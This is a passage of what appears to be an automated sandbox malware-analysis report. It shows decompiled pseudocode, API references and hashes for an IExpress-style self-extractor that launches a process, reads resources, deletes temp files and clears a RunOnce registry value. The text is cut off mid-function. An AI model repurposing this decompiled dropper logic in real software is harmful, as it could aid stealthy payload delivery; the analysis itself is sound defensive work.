                                                                                                                                                                                                        0x000c5918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,000C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-3033780695
                                                                                                                                                                                                        • Opcode ID: 4cbfd7621bd0ba92c0c3fa1fcf7a0b3c30e388d4382cfba01401da0cd764c79b
                                                                                                                                                                                                        • Instruction ID: a794d76569405fb05a42cc706b24e1b98423727f64aff5cf645411770dffdb31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cbfd7621bd0ba92c0c3fa1fcf7a0b3c30e388d4382cfba01401da0cd764c79b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE1126717006146BE7241F7A5C0DF9F7E99EF8A364B100659F506D31C2CA74A84582A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 c3fef-c4010 676 c410a-c411a call c6ce0 675->676 677 c4016-c403b CreateProcessA 675->677 678 c40c4-c4101 call c6285 GetLastError FormatMessageA call c44b9 677->678 679 c4041-c406e WaitForSingleObject GetExitCodeProcess 677->679 694 c4106 678->694 681 c4070-c4077 679->681 682 c4091 call c411b 679->682 681->682 685 c4079-c407b 681->685 689 c4096-c40b8 CloseHandle * 2 682->689 685->682 688 c407d-c4089 685->688 688->682 691 c408b 688->691 692 c4108 689->692 693 c40ba-c40c0 689->693 691->682 692->676 693->692 695 c40c2 693->695 694->692 695->694
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E000C3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E000C6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E000C44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xc8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xc9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xc9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xc9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x000c3fef
                                                                                                                                                                                                        0x000c3ffa
                                                                                                                                                                                                        0x000c4001
                                                                                                                                                                                                        0x000c4008
                                                                                                                                                                                                        0x000c400a
                                                                                                                                                                                                        0x000c400b
                                                                                                                                                                                                        0x000c4010
                                                                                                                                                                                                        0x000c410a
                                                                                                                                                                                                        0x000c411a
                                                                                                                                                                                                        0x000c411a
                                                                                                                                                                                                        0x000c401c
                                                                                                                                                                                                        0x000c401d
                                                                                                                                                                                                        0x000c401e
                                                                                                                                                                                                        0x000c401f
                                                                                                                                                                                                        0x000c4033
                                                                                                                                                                                                        0x000c403b
                                                                                                                                                                                                        0x000c40ca
                                                                                                                                                                                                        0x000c40e9
                                                                                                                                                                                                        0x000c40f8
                                                                                                                                                                                                        0x000c4101
                                                                                                                                                                                                        0x000c4106
                                                                                                                                                                                                        0x000c4106
                                                                                                                                                                                                        0x000c4108
                                                                                                                                                                                                        0x000c4108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4108
                                                                                                                                                                                                        0x000c4049
                                                                                                                                                                                                        0x000c405c
                                                                                                                                                                                                        0x000c4062
                                                                                                                                                                                                        0x000c4068
                                                                                                                                                                                                        0x000c406e
                                                                                                                                                                                                        0x000c4070
                                                                                                                                                                                                        0x000c4077
                                                                                                                                                                                                        0x000c407f
                                                                                                                                                                                                        0x000c4089
                                                                                                                                                                                                        0x000c408b
                                                                                                                                                                                                        0x000c408b
                                                                                                                                                                                                        0x000c4089
                                                                                                                                                                                                        0x000c4077
                                                                                                                                                                                                        0x000c4091
                                                                                                                                                                                                        0x000c409c
                                                                                                                                                                                                        0x000c40a8
                                                                                                                                                                                                        0x000c40b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c40c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c40c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 000C4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 000C405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 000C40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000C40DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000C40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 6876d4b24a26d12a0223a637c9f42b3dd821a4f716260d3d401d3a6082afa2ef
                                                                                                                                                                                                        • Instruction ID: fced0a1771ea3048286b50c7521faff7da91d0001308c7aaade71a1c32d99208
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6876d4b24a26d12a0223a637c9f42b3dd821a4f716260d3d401d3a6082afa2ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4231BC31640218ABFB609B65DC4DFAF77B8FB95704F2001ADFA45D21A2CA388D81CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E000C468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E000C468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E000C44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xc9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xc9124 = E000C6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x000c51fb
                                                                                                                                                                                                        0x000c5207
                                                                                                                                                                                                        0x000c520b
                                                                                                                                                                                                        0x000c523c
                                                                                                                                                                                                        0x000c5268
                                                                                                                                                                                                        0x000c5270
                                                                                                                                                                                                        0x000c528b
                                                                                                                                                                                                        0x000c5293
                                                                                                                                                                                                        0x000c529c
                                                                                                                                                                                                        0x000c52a6
                                                                                                                                                                                                        0x000c52b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c52b0
                                                                                                                                                                                                        0x000c529e
                                                                                                                                                                                                        0x000c5279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c527b
                                                                                                                                                                                                        0x000c5273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5273
                                                                                                                                                                                                        0x000c524a
                                                                                                                                                                                                        0x000c5250
                                                                                                                                                                                                        0x000c5256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5256
                                                                                                                                                                                                        0x000c5219
                                                                                                                                                                                                        0x000c5223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F4D,?,00000002,00000000), ref: 000C5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000C5250
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 42995ed482f6091ffa6c8f2751f535694c4c66ce8a3839516fd4b8a8dbd1e1a2
                                                                                                                                                                                                        • Instruction ID: 81f3beea2cfe8faae3e5f01b308fdee783332c705bb047d29746ebab7897305d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42995ed482f6091ffa6c8f2751f535694c4c66ce8a3839516fd4b8a8dbd1e1a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E11E2B9700A05ABF3246B719C5AF7F71DDEB8A385B20402DBA02D61D1DA7DDC005225
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E000C52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xc91e0; // 0x27a8eb8
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xc8a24 == 0 &&  *0xc9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xc8a24 == 0 &&  *0xc9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E000C1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        					if(( *0xc9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E000C65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E000C2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xc9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E000C1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xc8a20 =  *0xc8a20 & 0x00000000;
                                                                                                                                                                                                        				return E000C6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x000c52b6
                                                                                                                                                                                                        0x000c52b6
                                                                                                                                                                                                        0x000c52b6
                                                                                                                                                                                                        0x000c52c1
                                                                                                                                                                                                        0x000c52c8
                                                                                                                                                                                                        0x000c52cb
                                                                                                                                                                                                        0x000c52cc
                                                                                                                                                                                                        0x000c52d4
                                                                                                                                                                                                        0x000c52d6
                                                                                                                                                                                                        0x000c52d7
                                                                                                                                                                                                        0x000c52de
                                                                                                                                                                                                        0x000c52e0
                                                                                                                                                                                                        0x000c52f2
                                                                                                                                                                                                        0x000c52fa
                                                                                                                                                                                                        0x000c52fa
                                                                                                                                                                                                        0x000c5302
                                                                                                                                                                                                        0x000c5305
                                                                                                                                                                                                        0x000c530c
                                                                                                                                                                                                        0x000c5312
                                                                                                                                                                                                        0x000c5316
                                                                                                                                                                                                        0x000c5316
                                                                                                                                                                                                        0x000c5317
                                                                                                                                                                                                        0x000c531c
                                                                                                                                                                                                        0x000c531f
                                                                                                                                                                                                        0x000c5333
                                                                                                                                                                                                        0x000c5345
                                                                                                                                                                                                        0x000c5351
                                                                                                                                                                                                        0x000c5359
                                                                                                                                                                                                        0x000c5359
                                                                                                                                                                                                        0x000c5363
                                                                                                                                                                                                        0x000c5369
                                                                                                                                                                                                        0x000c536f
                                                                                                                                                                                                        0x000c5374
                                                                                                                                                                                                        0x000c5374
                                                                                                                                                                                                        0x000c5381
                                                                                                                                                                                                        0x000c5387
                                                                                                                                                                                                        0x000c5387
                                                                                                                                                                                                        0x000c538f
                                                                                                                                                                                                        0x000c53a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(027A8EB8,00000080,?,00000000), ref: 000C52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(027A8EB8), ref: 000C52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(027A8EB8,?,00000000), ref: 000C5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(027A8EB8), ref: 000C530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(000C11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-3647970563
                                                                                                                                                                                                        • Opcode ID: b2e585b5324459ae1869037962b6f3bd2b04444a8967c1bc2e9eebb2249af046
                                                                                                                                                                                                        • Instruction ID: 03fb4b12e2cdfe62446ccda09269e045e98d32bf4ed8acf300e37a0d87c62a69
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2e585b5324459ae1869037962b6f3bd2b04444a8967c1bc2e9eebb2249af046
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C121BE35500A08DFFB609B20DD09FAD37E0BB05385F14011DE846561A1CBB9AEC4CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xc8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x000c1fee
                                                                                                                                                                                                        0x000c2005
                                                                                                                                                                                                        0x000c200d
                                                                                                                                                                                                        0x000c2017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2020
                                                                                                                                                                                                        0x000c200d
                                                                                                                                                                                                        0x000c2029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,000C538C,?,?,000C538C), ref: 000C2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(000C538C,wextract_cleanup1,?,?,000C538C), ref: 000C2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(000C538C,?,?,000C538C), ref: 000C2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 849931509-1592051331
                                                                                                                                                                                                        • Opcode ID: 85e5ba97fc579779115715857a0a73f5e2b2f4cc985a2bbbb151a9014e2d6c73
                                                                                                                                                                                                        • Instruction ID: e6b441e5d6bf813d8b5a97e3172fe56e07c05bce55af069d3e48d637a4400a10
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85e5ba97fc579779115715857a0a73f5e2b2f4cc985a2bbbb151a9014e2d6c73
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCE04F30650718FBEB218B90EC0EF5D7B69F7017C4F300199BA04A0072EBA55A14D709
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
